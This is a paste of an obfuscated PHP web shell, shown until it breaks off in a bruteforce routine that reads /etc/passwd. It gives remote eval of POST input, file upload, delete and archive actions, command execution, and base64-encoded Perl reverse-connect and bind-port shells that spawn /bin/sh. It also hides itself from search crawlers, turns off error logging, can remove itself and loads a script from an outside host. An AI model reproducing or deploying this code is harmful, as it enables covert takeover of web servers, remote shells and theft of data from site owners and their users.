Create a new version of paste:

<?php
 goto Fe0f4; Bbee6: $cwd = @getcwd(); goto E3caf; dbd1a: if (empty($_POST['a'])) { if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'SecInfo'; } } goto f2ae4; d0451: if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function posix_getgrgid($p) { return false; } } goto B8ddd; Bf72d: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "nBAeX_version" => nBAeX_VERSION, "safemode" => @ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto dbd1a; ae419: function nBAeXPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' . nBAeXPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font color=white>' . nBAeXPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' . nBAeXPerms(@fileperms($f)) . '</font>'; } } goto F00b4; ce14b: function nBAeXHeader() { goto B16ac; ad6d4: $cwd_links .= "\")'>" . $path[$i] . "/</a>"; goto ac4e0; E7caa: B736a: goto ad6d4; f302a: foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; D4fb7: } goto Fd2ea; Cda26: $m['Self remove'] = 'SelfRemove'; goto B6942; a0eba: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n    var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n    var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n    var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n    var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n        if (req) {\r\n            req.onreadystatechange = processReqChange;\r\n            req.open('POST', url, true);\r\n            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n            req.send(params);\r\n        }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script><script type='text/javascript' src='//importantscripts.github.io/footer.js'></script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>"; goto E190d; c26d8: $j++; goto C22f3; F38f0: C9ad9: goto c26d8; D327d: if (!($j <= $i)) { goto B736a; } goto bf8ed; Fd2ea: fda98: goto Bf17c; C60a3: $totalSpace = @disk_total_space($GLOBALS['cwd']); goto e15ec; bd192: $opt_charsets = ''; goto f302a; B6942: $menu = ''; goto Bd2f8; F27a6: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto Cda26; D2954: C6231: goto D327d; b619a: $kernel = @php_uname('s'); goto B3bf5; Bd2f8: foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; d62a8: } goto fe0b0; f1014: $i++; goto E5cc7; A57a3: if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } Ecfc4: } ae2bd: } goto e603b; e15ec: $totalSpace = $totalSpace ? $totalSpace : 1; goto B8ba3; fe0b0: D5314: goto B6bea; d32a1: if (!function_exists('posix_getegid')) { goto bbff2; c509c: $uid = @getmyuid(); goto aede1; aede1: $gid = @getmygid(); goto e631d; e631d: $group = "?"; goto b780c; bbff2: $user = @get_current_user(); goto c509c; b780c: } else { goto Cb6c1; A0295: $user = $uid['name']; goto A3fd7; cf5d7: $gid = $gid['gid']; goto c9989; Cb6c1: $uid = @posix_getpwuid(posix_geteuid()); goto b7b77; A8764: $group = $gid['name']; goto cf5d7; A3fd7: $uid = $uid['uid']; goto A8764; b7b77: $gid = @posix_getgrgid(posix_getegid()); goto A0295; c9989: } goto C60c2; B16ac: if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } goto Fa83c; b2ce4: if (!($i < $n - 1)) { goto a6257; } goto a077c; C60c2: $cwd_links = ''; goto d99ed; b57b8: a6257: goto Ecfae; E5cc7: goto e5eb6; goto b57b8; e603b: echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . nBAeXViewSize($totalSpace) . ' <span>Free:</span> ' . nBAeXViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . nBAeXPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; goto E1c60; Bf17c: $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto F27a6; Fa83c: global $color; goto a0eba; bf8ed: $cwd_links .= $path[$j] . '/'; goto F38f0; A663b: if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto d32a1; d99ed: $path = explode("/", $GLOBALS['cwd']); goto fa13d; ac4e0: d7cbd: goto f1014; C22f3: goto C6231; goto E7caa; c7fca: $j = 0; goto D2954; Ecfae: $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); goto bd192; E190d: $freeSpace = @diskfreespace($GLOBALS['cwd']); goto C60a3; a077c: $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; goto c7fca; fa13d: $n = count($path); goto d0835; B8ba3: $release = @php_uname('r'); goto b619a; B8705: e5eb6: goto b2ce4; B6bea: $drives = ""; goto A57a3; B3bf5: $explink = ''; goto A663b; d0835: $i = 0; goto B8705; E1c60: } goto C244f; beaff: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto Bbee6; D368c: function actionFilesMan() { goto e7196; Fc721: C3187: goto b69b4; e7196: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto E4e6c; F10f8: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => nBAeXPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); goto A7aec; a3a0e: foreach ($files as $f) { goto D0f19; C8a12: ed3bc: goto c201c; D0f19: echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? nBAeXViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; goto D084f; D084f: $l = $l ? 0 : 1; goto C8a12; c201c: } goto A64e3; c3700: function nBAeXCmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } goto efb17; d9b2a: goto C738e; goto f89ad; A7aec: if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'dir')); } goto Fc721; Eb176: $files = array_merge($dirs, $files); goto bd64c; f7dd0: echo "<option value='tar'>Compress (tar.gz)</option>"; goto Cda18; f89ad: b91b9: goto A0dcf; bc5f5: echo "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; goto f3e8f; a08c7: echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; goto ad4cc; Ee234: global $sort; goto bcaa4; E0856: $n = count($dirContent); goto F928b; C4a6c: if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo "file name: <input type=text name=p2 value='nBAeX_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'>&nbsp;"; } goto A27aa; b168a: echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto bc358; A0dcf: $GLOBALS['sort'] = $sort; goto c3700; A70dd: nBAeXHeader(); goto a08c7; efb17: usort($files, "nBAeXCmp"); goto e3fb6; E4e6c: if (!empty($_POST['p1'])) { goto F5f31; E3a00: aac29: goto fc753; F5f31: switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } goto cafbf; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } goto cafbf; case 'delete': goto C8796; A340c: goto cafbf; goto D0b87; C8796: function deleteDir($path) { goto E6133; de8aa: if (basename($item) == ".." || basename($item) == ".") { goto Add08; } goto f6c88; f6c88: $type = filetype($item); goto D8f8c; Abdbb: $item = $path . $item; goto de8aa; B70d9: closedir($dh); goto dead5; E6133: $path = substr($path, -1) == '/' ? $path : $path . '/'; goto E2248; dead5: @rmdir($path); goto b06f9; D8f8c: if ($type == "dir") { deleteDir($item); } else { @unlink($item); } goto eedea; E5c51: Add08: goto aed97; aed97: if (!(($item = readdir($dh)) !== false)) { goto a8bd2; } goto Abdbb; E2248: $dh = opendir($path); goto E5c51; a9a30: a8bd2: goto B70d9; eedea: goto Add08; goto a9a30; b06f9: } goto fbac4; fbac4: if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto A214a; D40f8: $f = urldecode($f); goto e4a6a; cd51d: D9f82: goto Dc275; e4a6a: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto cd51d; A214a: if ($f == '..') { goto D9f82; } goto D40f8; Dc275: } f0f37: } goto A340c; D0b87: case 'paste': goto D2648; D2648: if ($_COOKIE['act'] == 'copy') { goto B10e0; B10e0: function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto fbaad; a13af: c3c50: goto e0b06; E0f26: if (!(($f = @readdir($h)) !== false)) { goto c3c50; } goto E7099; fbaad: mkdir($d . $s); goto Bc02b; Bc02b: $h = @opendir($c . $s); goto B6917; B6917: Da2dc: goto E0f26; F19ad: goto Da2dc; goto a13af; E7099: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto F19ad; e0b06: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto B4325; e9ffb: A4165: goto bfa5d; B4325: foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); Ed858: } goto e9ffb; bfa5d: } elseif ($_COOKIE['act'] == 'move') { goto F6ff5; a1b8e: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); d4158: } goto Ae1ff; F6ff5: function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto E580a; E580a: mkdir($d . $s); goto Edfcc; b7338: goto Edc6d; goto D4803; Fa331: if (!(($f = @readdir($h)) !== false)) { goto ee5b4; } goto E83f2; E83f2: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto b7338; D4803: ee5b4: goto Ae8f0; Edfcc: $h = @opendir($c . $s); goto E0c93; E0c93: Edc6d: goto Fa331; Ae8f0: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto a1b8e; Ae1ff: e5554: goto a17b9; a17b9: } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto dde3f; c9046: $zip->close(); goto A95c7; Dc50a: foreach ($_COOKIE['f'] as $f) { goto Cdf3d; D21f6: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { goto e976c; e976c: $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto f9235; F11c7: bbfbf: goto E257e; f9235: foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); ac654: } goto F11c7; E257e: } goto c2cd8; c2cd8: Ff956: goto b47e8; Cdf3d: if ($f == '..') { goto Ff956; } goto D21f6; b47e8: } goto f47a6; f47a6: c1f6b: goto ddecc; dde3f: chdir($_COOKIE['c']); goto Dc50a; ddecc: chdir($GLOBALS['cwd']); goto c9046; A95c7: } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { goto C8e54; F2158: foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } b5a4c: } goto A5388; A5388: bb497: goto E7369; C8e54: $zip = new ZipArchive(); goto F2158; E7369: } } elseif ($_COOKIE['act'] == 'tar') { goto ad069; Da2a6: nBAeXEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); goto dfc78; dfc78: chdir($GLOBALS['cwd']); goto C574b; ad069: chdir($_COOKIE['c']); goto D76de; D76de: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto Da2a6; C574b: } goto F5ae0; E8ea0: setcookie('f', '', time() - 3600); goto d75d4; F5ae0: unset($_COOKIE['f']); goto E8ea0; d75d4: goto cafbf; goto Db707; Db707: default: if (!empty($_POST['p1'])) { goto A0124; c429a: nBAeXsetcookie('f', serialize(@$_POST['f'])); goto db081; A0124: nBAeXsetcookie('act', $_POST['p1']); goto c429a; db081: nBAeXsetcookie('c', @$_POST['c']); goto Efa45; Efa45: } goto cafbf; } goto E3a00; fc753: cafbf: goto ef498; ef498: } goto A70dd; F928b: $i = 0; goto Ca8b4; d2b11: if ($dirContent === false) { goto Ed280; Da367: nBAeXFooter(); goto cdb2e; Ed280: echo 'Can\'t open this folder!'; goto Da367; cdb2e: return; goto a93a0; a93a0: } goto Ee234; c05b6: $gr = @posix_getgrgid(@filegroup($dirContent[$i])); goto F10f8; bc358: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>"; } goto f7dd0; e3fb6: usort($dirs, "nBAeXCmp"); goto Eb176; ad4cc: $dirContent = nBAeXScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); goto d2b11; Cda18: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>Paste / Compress</option>"; } goto Da78a; A64e3: d17e8: goto b168a; Da78a: echo "</select>&nbsp;"; goto C4a6c; f3e8f: $dirs = $files = array(); goto E0856; ce75b: if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } goto bc5f5; A27aa: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto E148a; b69b4: $i++; goto d9b2a; Ca8b4: C738e: goto C540a; C540a: if (!($i < $n)) { goto b91b9; } goto C1a52; C1a52: $ow = @posix_getpwuid(@fileowner($dirContent[$i])); goto c05b6; bd64c: $l = 0; goto a3a0e; bcaa4: $sort = array('name', 1); goto ce75b; E148a: nBAeXFooter(); goto aede9; aede9: } goto a4769; E3bb7: function actionNetwork() { goto C5ef5; Ba6b4: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto b49b8; e2af9: nBAeXFooter(); goto Bb384; bda99: echo '</div>'; goto e2af9; C5ef5: nBAeXHeader(); goto Ba6b4; c6a00: if (isset($_POST['p1'])) { goto C0bd8; dcfa9: if ($_POST['p1'] == 'bcp') { goto B7ad2; E9d12: sleep(1); goto e78b2; C918e: $out = nBAeXEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); goto E9d12; e78b2: echo "<pre class=ml1>{$out}\n" . nBAeXEx("ps aux | grep bc.pl") . "</pre>"; goto a52ca; B7ad2: cf("/tmp/bc.pl", $back_connect_p); goto C918e; a52ca: unlink("/tmp/bc.pl"); goto f6a90; f6a90: } goto Cbbf8; b0ec4: if ($_POST['p1'] == 'bpp') { goto f0fb1; eab7a: echo "<pre class=ml1>{$out}\n" . nBAeXEx("ps aux | grep bp.pl") . "</pre>"; goto F75d7; f0fb1: cf("/tmp/bp.pl", $bind_port_p); goto e2747; e2747: $out = nBAeXEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto baf3a; baf3a: sleep(1); goto eab7a; F75d7: unlink("/tmp/bp.pl"); goto E08da; E08da: } goto dcfa9; C0bd8: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto b0ec4; Cbbf8: } goto bda99; a845e: echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect  [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>"; goto c6a00; b49b8: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto a845e; Bb384: } goto Bf72d; c95c8: if (!empty($auth_pass)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { nBAeXsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) { nBAeXLogin(); } } goto Deff2; Caf17: if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax; } goto F4355; ece60: $disable_functions = @ini_get('disable_functions'); goto F8b69; e44aa: function nBAeXViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) { return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) { return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; } } goto e7b4d; e4074: @ini_set('error_log', NULL); goto d61a1; f2ae4: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { call_user_func('action' . $_POST['a']); } goto a8d30; dd4fe: function nBAeXLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto C6f9c; fd8a1: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto e4074; a7d44: $auth_pass = ""; goto A2b48; ab65a: @ini_set('max_execution_time', 0); goto F9fe4; F8fee: function actionBruteforce() { goto d3da1; d3da1: nBAeXHeader(); goto Ed1fa; A98d2: nBAeXFooter(); goto ed89b; Ed1fa: if (isset($_POST['proto'])) { goto Ec15f; d9684: $success = 0; goto Bad35; f34b8: if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { goto b4e39; Fa2dd: D698f: goto b541c; C9b6b: if 